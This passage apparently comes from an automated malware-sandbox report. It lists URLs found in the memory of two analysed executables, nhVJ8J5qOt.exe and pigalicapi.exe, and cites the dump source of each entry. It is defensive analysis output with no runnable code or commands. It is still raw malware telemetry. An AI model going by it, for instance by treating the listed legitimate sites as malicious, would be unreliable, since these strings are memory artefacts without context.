00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/images/cd/cdshop/cd_bright%20fortune.html
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/q
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/y
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.basmedcol.com
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533361544.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.bucea.edu.cn/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.832351846.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.c9dd.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.832351846.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.c9dd.com/.0#
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.832351846.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.c9dd.com/_#B
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533361544.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.ccri.com.cn/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000155D000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cel-cpa.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cel-cpa.com//
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000155D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cel-cpa.com/F
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533361544.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chd.com.cn/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533361544.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.cnpc.com.cn/cnpc/index.shtml
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533361544.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.cnpc.com.cn/cnpc/xhtml/images/logo.png
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000015A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cokocoko.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.651017417.00000000076D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cokocoko.com/9
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.651017417.00000000076D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cokocoko.com/a
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.651017417.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641101813.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.739131542.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650670746.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.739674320.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.832351846.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.739131542.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.832351846.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/E
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/connect-polylang-elementor/assets/css/language-switcher.mi
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor-pro/assets/css/frontend-lite.min.css?ver=3.13.2
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor-pro/assets/js/elements-handlers.min.js?ver=3.13.
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.13.2
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver=3.13.4
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 